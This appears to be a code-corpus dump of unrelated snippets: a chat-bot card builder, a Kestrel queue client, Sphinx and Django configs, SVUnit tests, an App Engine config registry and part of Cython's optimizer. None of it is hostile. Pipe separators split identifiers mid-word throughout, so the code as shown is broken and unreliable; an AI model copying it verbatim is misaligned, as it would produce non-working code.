@app.route('/', methods=['GET'])
def home_get():
"""Respond to GET requests to this endpoint.
This function responds to requests with a simple HTML landing page for this
App Engine instance.
"""
return render_template('home.html')
def create_card_response(event_message):
"""Creates a card response based on the message sent in Hangouts Chat.
See the reference for JSON keys and format for cards:
https://developers.google.com/hangouts/chat/reference/message-formats/cards
Args:
eventMessage: the user's message to the bot
"""
response = dict()
cards = list()
widgets = list()
header = None
words = event_message.lower().split()
for word in words:
if word == 'header':
header = {
'header': {
'title': BOT_HEADER,
'subtitle': 'Card header',
'imageUrl': 'https://goo.gl/5obRKj',
'imageStyle': 'IMAGE'
}
}
elif word == 'textparagraph':
widgets.append({
'textParagraph': {
'text': '<b>This</b> is a <i>text paragraph</i>.'
}
})
elif word == 'keyvalue':
widgets.append({
'keyValue': {
'topLabel': 'KeyValue Widget',
'content': 'This is a KeyValue widget',
'bottomLabel': 'The bottom label',
'icon': 'STAR'
}
})
elif word == 'interactivetextbutton':
widgets.append({
'buttons': [
{
'textButton': {
'text': 'INTERACTIVE BUTTON',
'onClick': {
'action': {
'actionMethodName': INTERACTIVE_TEXT_BUTTON_ACTION,
'parameters': [{
'key': INTERACTIVE_BUTTON_PARAMETER_KEY,
'value': event_message
}]
}
}
}
}
]
})
elif word == 'interactiveimagebutton':
widgets.append({
'buttons': [
{
'imageButton': {
'icon': 'EVENT_SEAT',
'onClick': {
'action': {
'actionMethodName': INTERACTIVE_IMAGE_BUTTON_ACTION,
'parameters': [{
'key': INTERACTIVE_BUTTON_PARAMETER_KEY,
'value': event_message
}]
}
}
}
}
]
})
elif word == 'textbutton':
widgets.append({
'buttons': [
{
'textButton': {
'text': 'TEXT BUTTON',
'onClick': {
| 'openLink': {
'url': 'https://developers.google.com',
}
}
}
}
]
})
elif word == 'imagebutton':
| widgets.append({
'buttons': [
{
'imageButton': {
'icon': 'EVENT_SEAT',
'onClick': {
'openLink': {
'url': 'https://developers.google.com',
}
}
}
}
]
})
elif word == 'image':
widgets.append({
'image': {
'imageUrl': 'https://goo.gl/Bpa3Y5',
'onClick': {
'openLink': {
'url': 'https://developers.google.com'
}
}
}
})
if header is not None:
cards.append(header)
cards.append({'sections': [{'widgets': widgets}]})
response['cards'] = cards
return response
def respond_to_interactive_card_click(action_name, custom_params):
"""Creates a response for when the user clicks on an interactive card.
See the guide for creating interactive cards
https://developers.google.com/hangouts/chat/how-tos/cards-onclick
Args:
action_name: the name of the custom action defined in the original bot response
custom_params: the parameters defined in the original bot response
"""
message = 'You clicked {}'.format(
'a text button' if action_name == INTERACTIVE_TEXT_BUTTON_ACTION
else 'an image button')
original_message = ""
if custom_params[0]['key'] == INTERACTIVE_BUTTON_PARAMETER_KEY:
original_message = custom_params[0]['value']
else:
original_message = '<i>Cannot determine original message</i>'
# If you want to respond to the same room but with a new message,
# change the following value to NEW_MESSAGE.
action_response = 'UPDATE_MESSAGE'
return {
'actionResponse': {
'type': action_res |
shawnsi/bisectdemo | squares.py | Python | mit | 176 | 0.005682 | #!/usr/bin/env python
from __future__ import print_f | unction
import sys
| integer = int(sys.argv[1])
print(integer**2)
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
maw/python-kestrel | kestrel.py | Python | mit | 2,224 | 0.008094 | # -*- coding: utf-8 -*-
import memcache
# XXX where best to specify timeout? constructor or various methods?
class KestrelEnqueueException(Exception):
pass
class connection(object):
def __init__(self, s | ervers, queue, reliable=True,
default_timeout=0, fanout_key=None):
if fanout_key == None:
self.__queue = queue
else:
self.__queue = "%s+ | %s" % (queue, fanout_key)
pass
self.__reliable = reliable
if default_timeout == 0:
self.__timeout_suffix = ""
else:
self.__timeout_suffix = "t=%d" % default_timeout
pass
if reliable:
self.dequeue = self.__reliable_read_fn
self.dequeue_finish = self.__reliable_finish_read_fn
self.dequeue_abort = self.__reliable_abort_read_fn
self.enqueue = self.__reliable_write_fn
self.__reliable_read_key = "%s/open/%s" % \
(self.__queue, self.__timeout_suffix)
self.__reliable_close_key = "%s/close" % self.__queue
self.__reliable_abort_key = "%s/abort" % self.__queue
else:
self.dequeue = None # self.__unreliable_read_fn
self.dequeue_finish = None # self.__unreliable_finish_read_fn
self.dequeue_abort = None # self.__unreliable_abort_read_fn
self.enqueue = None
pass
self.__mc = memcache.Client(servers, allow_get_timeouts=True, debug=1)
pass
def __reliable_write_fn(self, value):
ret = self.__mc.set(self.__queue, value)
if ret == 0:
raise KestrelEnqueueException()
return ret
def __reliable_read_fn(self, timeout=0):
# FIXME timeout belongs here, somehow
key = "%s/t=%d" % (self.__queue, timeout)
l = self.__mc.get(key)
return l
def __reliable_finish_read_fn(self):
l = self.__mc.get(self.__reliable_close_key)
pass
def __reliable_abort_read_fn(self):
l = self.__mc.get(self.__reliable_abort_key)
pass
# TODO: write the unreliable equivalents some day
pass
|
calston/tdjango | manage_test.py | Python | mit | 264 | 0.003788 | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tdjango.tests.testapp.settings")
from django.core.managem | ent impo | rt execute_from_command_line
execute_from_command_line(sys.argv)
|
OCA/OpenUpgrade | docsource/conf.py | Python | agpl-3.0 | 5,996 | 0.000167 | #
# OpenUpgrade documentation build configuration file, created by
# sphinx-quickstart on Wed Nov 30 10:38:00 2011.
#
# This file is execfile()d with the current directory set to its containing
# dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed
# automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ["sphinx.ext.autodoc"]
# Add any paths that contain templates here, relative to this directory.
templates_path = [".templates"]
# The suffix of source filenames.
source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# General substitutions.
project = "OpenUpgrade"
# Rename to project_copyright after the release of Sphinx 3.5
# pylint: disable=redefined-builtin
copyright = "2012-2021, Odoo Community Association (OCA) / The OpenUpgrade developers"
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
version = "14.0"
# The full version, including alpha/beta/rc tags.
release = "14.0"
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = "%B %d, %Y"
# List of documents that shouldn't be included in the build.
# unused_docs = []
# List of directories, relative to source directories, that shouldn't be
# searched for source files.
# exclude_dirs = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
# html_style = 'classic.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = [".static"]
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = "%b %d, %Y"
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_use_modindex = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
html_copy_source = False
# Hide the Page source link in each documentation page's footer.
html_show_sourcelink = False
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = "OpenUpgradedoc"
# Options for LaTeX output
# ------------------------
latex_elements = {"papersize": "a4paper"}
# The paper size ('letter' or 'a4').
# latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
# latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class
# [howto/manual]).
latex_documents = [
(
"index",
"OpenUpgrade.tex",
"OpenUpgrade Documentation",
"The OpenUpgrade team",
"manual",
),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# Additional stuff for the LaTeX preamble.
# latex_preamble = ''
# Documents to append as an appendix to all m | anuals.
# latex_appendices = []
# If false | , no module index is generated.
# latex_use_modindex = True
|
svunit/svunit | test/test_run_script.py | Python | apache-2.0 | 9,783 | 0.001738 | import subprocess
import pytest
from utils import *
@all_available_simulators()
def test_filter(tmp_path, simulator):
unit_test = tmp_path.joinpath('some_unit_test.sv')
unit_test.write_text('''
module some_unit_test;
import svunit_pkg::*;
`include "svunit_defines.svh"
string name = "some_ut";
svunit_testcase svunit_ut;
function void build();
svunit_ut = new(name);
endfunction
task setup();
svunit_ut.setup();
endtask
task teardown();
svunit_ut.teardown();
endtask
`SVUNIT_TESTS_BEGIN
`SVTEST(some_failing_test)
`FAIL_IF(1)
`SVTEST_END
`SVTEST(some_passing_test)
`FAIL_IF(0)
`SVTEST_END
`SVUNIT_TESTS_END
endmodule
''')
log = tmp_path.joinpath('run.log')
print('Filtering only the passing test should block the fail')
subprocess.check_call(['runSVUnit', '-s', simulator, '--filter', 'some_ut.some_passing_test'], cwd=tmp_path)
assert 'FAILED' not in log.read_text()
print('No explicit filter should cause both tests to run, hence trigger the fail')
subprocess.check_call(['runSVUnit', '-s', simulator], cwd=tmp_path)
assert 'FAILED' in log.read_text()
@all_available_simulators()
def test_filter_wildcards(tmp_path, simulator):
failing_unit_test = tmp_path.joinpath('some_failing_unit_test.sv')
failing_unit_test.write_text('''
module some_failing_unit_test;
import svunit_pkg::*;
`include "svunit_defines.svh"
string name = "some_failing_ut";
svunit_testcase svunit_ut;
function void build();
svunit_ut = new(name);
endfunction
task setup();
svunit_ut.setup();
endtask
task teardown();
svunit_ut.teardown();
endtask
`SVUNIT_TESTS_BEGIN
`SVTEST(some_test)
`FAIL_IF(1)
`SVTEST_END
`SVUNIT_TESTS_END
endmodule
''')
passing_unit_test = tmp_path.joinpath('some_passing_unit_test.sv')
passing_unit_test.write_text('''
module some_passing_unit_test;
import svunit_pkg::*;
`include "svunit_defines.svh"
string name = "some_passing_ut";
svunit_testcase svunit_ut;
function void build();
svunit_ut = new(name);
endfunction
task setup();
svunit_ut.setup();
endtask
task teardown();
svunit_ut.teardown();
endtask
`SVUNIT_TESTS_BEGIN
`SVTEST(some_test)
`FAIL_IF(0)
`SVTEST_END
`SVUNIT_TESTS_END
endmodule
''')
log = tmp_path.joinpath('run.log')
print('Filtering only the passing testcase should block the fail')
subprocess.check_call(['runSVUnit', '-s', simulator, '--filter', 'some_passing_ut.*'], cwd=tmp_path)
assert 'FAILED' not in log.read_text()
assert 'some_test' in log.read_text()
print('Filtering only for the test should cause both tests to run, hence trigger the fail')
subprocess.check_call(['runSVUnit', '-s', simulator, '--filter', "*.some_test"], cwd=tmp_path)
assert 'FAILED' in log.read_text()
@all_available_simulators()
def test_filter_without_dot(tmp_path, simulator):
dummy_unit_test = tmp_path.joinpath('dummy_unit_test.sv')
dummy_unit_test.write_text('''
module dummy_unit_test;
import svunit_pkg::*;
`include "svunit_defines.svh"
string name = "some_passing_ut";
svunit_testcase svunit_ut;
function void build();
svunit_ut = new(name);
endfunction
task setup();
svunit_ut.setup();
endtask
task teardown();
svunit_ut.teardown();
endtask
`SVUNIT_TESTS_BEGIN
`SVUNIT_TESTS_END
endmodule
''')
subprocess.check_call(['runSVUnit', '-s', simulator, '--filter', 'some_string'], cwd=tmp_path)
log = tmp_path.joinpath('run.log')
assert 'fatal' in log.read_text().lower()
@all_available_simulators()
def test_filter_with_extra_dot(tmp_path, simulator):
dummy_unit_test = tmp_path.joinpath('dummy_unit_test.sv')
dummy_unit_test.write_text('''
module dummy_unit_test;
import svunit_pkg::*;
`include "svunit_defines.svh"
string name = "some_passing_ut";
svunit_testcase svunit_ut;
function void build();
svunit_ut = new(name);
endfunction
task setup();
svunit_ut.setup();
endtask
task teardown();
svunit_ut.teardown();
endtask
`SVUNIT_TESTS_BEGIN
`SVUNIT_TESTS_END
endmodule
''')
subprocess.check_call(['runSVUnit', '-s', simulator, '--filter', 'a.b.c'], cwd=tmp_path)
log = tmp_path.joinpath('run.log')
assert 'fatal' in log.read_text().lower()
@all_available_simulators()
def test_filter_with_partial_widlcard(tmp_path, simulator):
dummy_unit_test = tmp_path.joinpath('dummy_unit_test.sv')
dummy_unit_test.write_text('''
module dummy_unit_test;
import svunit_pkg::*;
`include "svunit_defines.svh"
string name = "some_passing_ut";
svunit_testcase svunit_ut;
function void build();
svunit_ut = new(name);
endfunction
task setup();
svunit_ut.setup();
endtask
task teardown();
svunit_ut.teardown();
endtask
`SVUNIT_TESTS_BEGIN
`SVUNIT_TESTS_END
endmodule
''')
subprocess.check_call(['runSVUnit', '-s', simulator, '--filter', 'foo*.bar'], cwd=tmp_path)
log = tmp_path.joinpath('run.log')
assert 'fatal' in log.read_text().lower()
subprocess.check_call(['runSVUnit', '-s', simulator, '--filter', 'foo.bar*'], cwd=tmp_path)
log = tmp_path.joinpath('run.log')
assert 'fatal' in log.read_text().lower()
subprocess.check_call(['runSVUnit', '-s', simulator, '--filter', '*foo.bar'], cwd=tmp_path)
log = tmp_path.joinpath('run.log')
assert 'fatal' in log.read_text().lower()
@all_available_simulators()
def test_multiple_filter_expressions(tmp_path, simulator):
unit_test = tmp_path.joinpath('some_unit_test.sv')
unit_test.write_text('''
module some_unit_test;
import svunit_pkg::*;
`include "svunit_defines.svh"
string name = "some_ut";
svunit_testcase svunit_ut;
function void build();
svunit_ut = new(name);
endfunction
task setup();
svunit_ut.setup();
endtask
task teardown();
svunit_ut.teardown();
endtask
`SVUNIT_TESTS_BEGIN
`SVTEST(some_failing_test)
`FAIL_IF(1)
`SVTEST_END
`SVTEST(some_passing_test)
`FAIL_IF(0)
`SVTEST_END
`SVTEST(some_other_passing_test)
`FAIL_IF(0)
`SVTEST_END
`SVTEST(yet_another_passing_test)
`FAIL_IF(0)
`SVTEST_END
`SVUNIT_TESTS_END
endmodule
''')
log = tmp_path.joinpath('run.log')
print('Filtering only the passing testcases should | block the fail')
subprocess.check_call(
[
'runSVUnit',
'-s', simulator,
'--filter', '*.some_passing_test:*.some_other_passing_test:*.yet_another_passing_test',
| ],
cwd=tmp_path)
assert 'FAILED' not in log.read_text()
assert 'some_passing_test' in log.read_text()
assert 'some_other_passing_test' in log.read_text()
assert 'yet_another_passing_test' in log.read_text()
@all_available_simulators()
def test_negative_filter(tmp_path, simulator):
unit_test = tmp_path.joinpath('some_unit_test.sv')
unit_test.write_text('''
module some_unit_test;
import svunit_pkg::*;
`include "svunit_defines.svh"
string name = "some_ut";
svunit_testcase svunit_ut;
function void build();
svunit_ut = new(name);
endfunction
task setup();
svunit_ut.setup();
endtask
task teardown();
svunit_ut.teardown();
endtask
`SVUNIT_TESTS_BEGIN
`SVTEST(some_failing_test)
`FAIL_IF(1)
`SVTEST_END
`SVTEST(some_other_failing_test)
`FAIL_IF(1)
`SVTEST_END
`SVTEST(some_passing_test)
`FAIL_IF(0)
`SVTEST_END
`SVUNIT_TESTS_END
endmodule
''')
log = tmp_path.joinpath('run.log')
print('Filtering out the failing tests should block the fail')
subprocess.check_call(
['runSVUnit',
'-s', simulator,
'--filter', '-some_ut.some_failing_test:some_ut.some_other_failing_test',
],
cwd=tmp_path)
assert 'FAILED' not in log.read_text()
assert 'some_passing_test' in log.read_text()
@all_available_simulators()
def test_positive_and_negative_filter(tmp_path, simulator):
unit_test = tmp_path.joinp |
supunkamburugamuve/mooc2 | models/config.py | Python | apache-2.0 | 8,582 | 0.000466 | # Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Manages dynamic properties of an application and/or its modules.
An application must explicitly declare properties and provide a type, doc string
and default value for each. The default property values are overridden by
the new values found in the environment variable with the same name. Those are
further overridden by the values found in the datastore. We also try to do all
of this with performance in mind.
"""
__author__ = 'Pavel Simakov (psimakov@google.com)'
import logging
import os
import time
import appengine_config
import entities
import transforms
from google.appengine.api import namespace_manager
from google.appengine.ext import db
# The default update interval supported.
DEFAULT_UPDATE_INTERVAL = 60
# The longest update interval supported.
MAX_UPDATE_INTERVAL = 60 * 5
# Allowed property types.
TYPE_INT = int
TYPE_STR = str
TYPE_BOOL = bool
ALLOWED_TYPES = frozenset([TYPE_INT, TYPE_STR, TYPE_BOOL])
class ConfigProperty(object):
    """A named, typed configuration property with a default value.

    The effective value is resolved in priority order: datastore override
    (via Registry), then an os.environ override, then the declared default.
    """

    def __init__(
            self, name, value_type, doc_string,
            default_value=None, multiline=False):
        """Declares and registers a new property.

        Args:
            name: unique property name; also used for os.environ lookups.
            value_type: one of ALLOWED_TYPES (int, str, bool).
            doc_string: human-readable description of the property.
            multiline: whether the value may span multiple lines.

        Raises:
            ValueError: if value_type is not one of ALLOWED_TYPES.
        """
        if value_type not in ALLOWED_TYPES:
            # ValueError subclasses Exception, so pre-existing callers that
            # caught Exception keep working.
            raise ValueError('Bad value type: %s' % value_type)
        self._multiline = multiline
        self._name = name
        self._type = value_type
        self._doc_string = doc_string
        # NOTE(review): a None default is cast too (e.g. str(None) == 'None');
        # presumably intentional -- confirm before changing.
        self._default_value = value_type(default_value)
        self._value = None
        # Self-register so Registry can apply datastore overrides by name.
        Registry.registered[name] = self

    @property
    def multiline(self):
        return self._multiline

    @property
    def name(self):
        return self._name

    @property
    def value_type(self):
        return self._type

    @property
    def doc_string(self):
        return self._doc_string

    @property
    def default_value(self):
        return self._default_value

    def get_environ_value(self):
        """Tries to get value from the environment variables.

        Returns:
            A (has_value, value) tuple. A variable that fails to cast to
            this property's type is deleted from os.environ as a side
            effect, so the bad value is not retried on the next lookup.
        """
        # Look for a name in lower or upper case.
        name = None
        if self._name.lower() in os.environ:
            name = self._name.lower()
        elif self._name.upper() in os.environ:
            name = self._name.upper()
        if name:
            try:
                return True, transforms.string_to_value(
                    os.environ[name], self.value_type)
            except Exception:  # pylint: disable-msg=broad-except
                logging.error(
                    'Property %s failed to cast to type %s; removing.',
                    self._name, self._type)
                del os.environ[name]
        return False, None

    @property
    def value(self):
        """Get the latest value from datastore, environment or use default."""
        # Try datastore overrides first.
        overrides = Registry.get_overrides()
        if overrides and self.name in overrides:
            return overrides[self.name]
        # Try environment variable overrides second.
        has_value, environ_value = self.get_environ_value()
        if has_value:
            return environ_value
        # Use default value last.
        return self._default_value
class Registry(object):
    """Holds all registered properties and caches datastore overrides."""

    # Maps property name -> ConfigProperty for every declared property.
    registered = {}
    # Latest overrides loaded from the datastore.
    db_overrides = {}
    # How often (seconds) to refresh db_overrides from the datastore.
    update_interval = DEFAULT_UPDATE_INTERVAL
    # Timestamp of the last refresh attempt (successful or not).
    last_update_time = 0
    # Monotonic counter of refresh attempts.
    update_index = 0

    @classmethod
    def get_overrides(cls, force_update=False):
        """Returns current property overrides, maybe cached.

        Returns None when datastore overrides are disabled, i.e. when the
        update interval is 0 via the environment or the property default.
        """
        # Check if datastore property overrides are enabled at all.
        has_value, environ_value = UPDATE_INTERVAL_SEC.get_environ_value()
        if (has_value and environ_value == 0) or (
                UPDATE_INTERVAL_SEC.default_value == 0):
            return

        # Check if cached values are still fresh.
        now = long(time.time())
        age = now - cls.last_update_time
        if force_update or age < 0 or age >= cls.update_interval:
            try:
                old_namespace = namespace_manager.get_namespace()
                try:
                    # Overrides always live in the default namespace.
                    namespace_manager.set_namespace(
                        appengine_config.DEFAULT_NAMESPACE_NAME)
                    cls.load_from_db()
                finally:
                    namespace_manager.set_namespace(old_namespace)
            except Exception as e:  # pylint: disable-msg=broad-except
                logging.error(
                    'Failed to load properties from a database: %s.', str(e))
            finally:
                # Avoid overload and update timestamp even if we failed.
                cls.last_update_time = now
                cls.update_index += 1

        return cls.db_overrides

    @classmethod
    def load_from_db(cls):
        """Loads dynamic property overrides from the datastore."""
        logging.info('Reloading properties.')
        overrides = {}
        for item in ConfigPropertyEntity.all().fetch(1000):
            name = item.key().name()
            if name not in cls.registered:
                logging.error(
                    'Property is not registered (skipped): %s', name)
                continue
            target = cls.registered[name]
            if target and not item.is_draft:
                # Enforce value type.
                try:
                    value = transforms.string_to_value(
                        item.value, target.value_type)
                except Exception:  # pylint: disable-msg=broad-except
                    logging.error(
                        'Property %s failed to cast to a type %s; removing.',
                        target.name, target.value_type)
                    continue

                # Don't allow disabling of update interval from a database.
                if name == UPDATE_INTERVAL_SEC.name:
                    if value <= 0 or value > MAX_UPDATE_INTERVAL:
                        # Bug fix: the message reads 'Bad value %s for %s',
                        # so the value must come first; the original logged
                        # (name, value) in the wrong order.
                        logging.error(
                            'Bad value %s for %s; discarded.', value, name)
                        continue
                    else:
                        cls.update_interval = value

                overrides[name] = value
        cls.db_overrides = overrides
class ConfigPropertyEntity(entities.BaseEntity):
    """A class that represents a named configuration property."""
    # Serialized property value; stored as text and cast to the declared
    # type when loaded (see Registry.load_from_db). Not indexed: entities
    # are fetched in bulk, never queried by value.
    value = db.TextProperty(indexed=False)
    # When True, the stored value is a draft and must not override the
    # live property value (skipped by Registry.load_from_db).
    is_draft = db.BooleanProperty(indexed=False)
def run_all_unit_tests():
    """Runs all unit tests for this module."""
    str_prop = ConfigProperty('gcb-str-prop', str, ('doc for str_prop'), 'foo')
    int_prop = ConfigProperty('gcb-int-prop', int, ('doc for int_prop'), 123)

    # Defaults are visible both directly and via .value.
    assert str_prop.default_value == 'foo'
    assert str_prop.value == 'foo'
    assert int_prop.default_value == 123
    assert int_prop.value == 123

    # Check os.environ override works.
    os.environ[str_prop.name] = 'bar'
    assert str_prop.value == 'bar'
    del os.environ[str_prop.name]
    assert str_prop.value == 'foo'

    # Check os.environ override with type casting.
    os.environ[int_prop.name] = '12345'
    assert int_prop.value == 12345

    # Check setting of value is disallowed (read-only property).
    try:
        str_prop.value = 'foo'
        raise Exception()
    except AttributeError:
        pass

    # Check value of bad type is disregarded; the failed cast also removes
    # the offending variable from os.environ as a side effect.
    os.environ[int_prop.name] = 'foo bar'
    assert int_prop.value == int_prop.default_value
    assert int_prop.name not in os.environ
UPDATE_INTERVAL_SEC = ConfigProperty(
'gcb_config_update_interval_sec', int, (
'An update interval (in seconds) for reloading runtime properties '
'from a datastore. Using this editor, y |
hhsprings/cython | Cython/Compiler/Optimize.py | Python | apache-2.0 | 186,187 | 0.003829 | from __future | __ import absolute_import
import sys
import copy
import codecs
from . import TypeSlots
from .ExprNodes import not_a_constant
import cython
cython.declare(UtilityCode=object, EncodedString=object, bytes_literal=object,
Nodes=object, ExprNodes=object, PyrexTypes=object, Builtin=object,
UtilNodes=object, _py_int_types=object)
if sys.version_info[0] >= 3:
_py_int_types = int
else:
| _py_int_types = (int, long)
from . import Nodes
from . import ExprNodes
from . import PyrexTypes
from . import Visitor
from . import Builtin
from . import UtilNodes
from . import Options
from .Code import UtilityCode, TempitaUtilityCode
from .StringEncoding import EncodedString, bytes_literal
from .Errors import error
from .ParseTreeTransforms import SkipDeclarations
try:
from __builtin__ import reduce
except ImportError:
from functools import reduce
try:
from __builtin__ import basestring
except ImportError:
basestring = str # Python 3
def load_c_utility(name):
    """Return the cached utility code block *name* from Optimize.c."""
    utility = UtilityCode.load_cached(name, "Optimize.c")
    return utility
def unwrap_coerced_node(node, coercion_nodes=(ExprNodes.CoerceToPyTypeNode, ExprNodes.CoerceFromPyTypeNode)):
    """Strip a single to/from-Python coercion wrapper from *node*, if any."""
    return node.arg if isinstance(node, coercion_nodes) else node
def unwrap_node(node):
    """Follow ResultRefNode indirections down to the underlying expression."""
    if isinstance(node, UtilNodes.ResultRefNode):
        return unwrap_node(node.expression)
    return node
def is_common_value(a, b):
    """Return True if *a* and *b* syntactically denote the same value.

    Only plain names and non-Python attribute chains rooted at a common
    name are recognised; everything else conservatively compares unequal.
    """
    lhs = unwrap_node(a)
    rhs = unwrap_node(b)
    if isinstance(lhs, ExprNodes.NameNode) and isinstance(rhs, ExprNodes.NameNode):
        return lhs.name == rhs.name
    if isinstance(lhs, ExprNodes.AttributeNode) and isinstance(rhs, ExprNodes.AttributeNode):
        return (not lhs.is_py_attr
                and is_common_value(lhs.obj, rhs.obj)
                and lhs.attribute == rhs.attribute)
    return False
def filter_none_node(node):
    """Map nodes whose constant value is None to None; pass others through."""
    if node is None:
        return None
    return None if node.constant_result is None else node
class _YieldNodeCollector(Visitor.TreeVisitor):
    """
    YieldExprNode finder for generator expressions.
    """
    def __init__(self):
        Visitor.TreeVisitor.__init__(self)
        # Maps each collected YieldExprNode to its enclosing ExprStatNode,
        # for yields used as plain statements.
        self.yield_stat_nodes = {}
        # All yield expressions found, in visit order.
        self.yield_nodes = []
    # Generic fallback for all other node types: just recurse into children.
    visit_Node = Visitor.TreeVisitor.visitchildren
    def visit_YieldExprNode(self, node):
        self.yield_nodes.append(node)
        self.visitchildren(node)
    def visit_ExprStatNode(self, node):
        # Children are visited first so a contained yield is already
        # recorded in self.yield_nodes when we check node.expr below.
        self.visitchildren(node)
        if node.expr in self.yield_nodes:
            self.yield_stat_nodes[node.expr] = node
    # everything below these nodes is out of scope:
    def visit_GeneratorExpressionNode(self, node):
        pass
    def visit_LambdaNode(self, node):
        pass
    def visit_FuncDefNode(self, node):
        pass
def _find_single_yield_expression(node):
    """Return the (argument, statement) pair of the only yield below *node*,
    or (None, None) if there is not exactly one statement-level yield."""
    statements = _find_yield_statements(node)
    if len(statements) == 1:
        return statements[0]
    return None, None
def _find_yield_statements(node):
    """Collect (argument, statement) pairs for every statement-level yield
    below *node*; return [] if any yield is used as a non-statement."""
    collector = _YieldNodeCollector()
    collector.visitchildren(node)
    pairs = []
    for yield_node in collector.yield_nodes:
        stat_node = collector.yield_stat_nodes.get(yield_node)
        if stat_node is None:
            # found YieldExprNode without ExprStatNode (i.e. a non-statement
            # usage of 'yield') -- bail out entirely.
            return []
        pairs.append((yield_node.arg, stat_node))
    return pairs
class IterationTransform(Visitor.EnvTransform):
"""Transform some common for-in loop patterns into efficient C loops:
- for-in-dict loop becomes a while loop calling PyDict_Next()
- for-in-enumerate is replaced by an external counter variable
- for-in-range loop becomes a plain C for loop
"""
def visit_PrimaryCmpNode(self, node):
if node.is_ptr_contains():
# for t in operand2:
# if operand1 == t:
# res = True
# break
# else:
# res = False
pos = node.pos
result_ref = UtilNodes.ResultRefNode(node)
if node.operand2.is_subscript:
base_type = node.operand2.base.type.base_type
else:
base_type = node.operand2.type.base_type
target_handle = UtilNodes.TempHandle(base_type)
target = target_handle.ref(pos)
cmp_node = ExprNodes.PrimaryCmpNode(
pos, operator=u'==', operand1=node.operand1, operand2=target)
if_body = Nodes.StatListNode(
pos,
stats = [Nodes.SingleAssignmentNode(pos, lhs=result_ref, rhs=ExprNodes.BoolNode(pos, value=1)),
Nodes.BreakStatNode(pos)])
if_node = Nodes.IfStatNode(
pos,
if_clauses=[Nodes.IfClauseNode(pos, condition=cmp_node, body=if_body)],
else_clause=None)
for_loop = UtilNodes.TempsBlockNode(
pos,
temps = [target_handle],
body = Nodes.ForInStatNode(
pos,
target=target,
iterator=ExprNodes.IteratorNode(node.operand2.pos, sequence=node.operand2),
body=if_node,
else_clause=Nodes.SingleAssignmentNode(pos, lhs=result_ref, rhs=ExprNodes.BoolNode(pos, value=0))))
for_loop = for_loop.analyse_expressions(self.current_env())
for_loop = self.visit(for_loop)
new_node = UtilNodes.TempResultFromStatNode(result_ref, for_loop)
if node.operator == 'not_in':
new_node = ExprNodes.NotNode(pos, operand=new_node)
return new_node
else:
self.visitchildren(node)
return node
def visit_ForInStatNode(self, node):
self.visitchildren(node)
return self._optimise_for_loop(node, node.iterator.sequence)
def _optimise_for_loop(self, node, iterator, reversed=False):
if iterator.type is Builtin.dict_type:
# like iterating over dict.keys()
if reversed:
# CPython raises an error here: not a sequence
return node
return self._transform_dict_iteration(
node, dict_obj=iterator, method=None, keys=True, values=False)
# C array (slice) iteration?
if iterator.type.is_ptr or iterator.type.is_array:
return self._transform_carray_iteration(node, iterator, reversed=reversed)
if iterator.type is Builtin.bytes_type:
return self._transform_bytes_iteration(node, iterator, reversed=reversed)
if iterator.type is Builtin.unicode_type:
return self._transform_unicode_iteration(node, iterator, reversed=reversed)
# the rest is based on function calls
if not isinstance(iterator, ExprNodes.SimpleCallNode):
return node
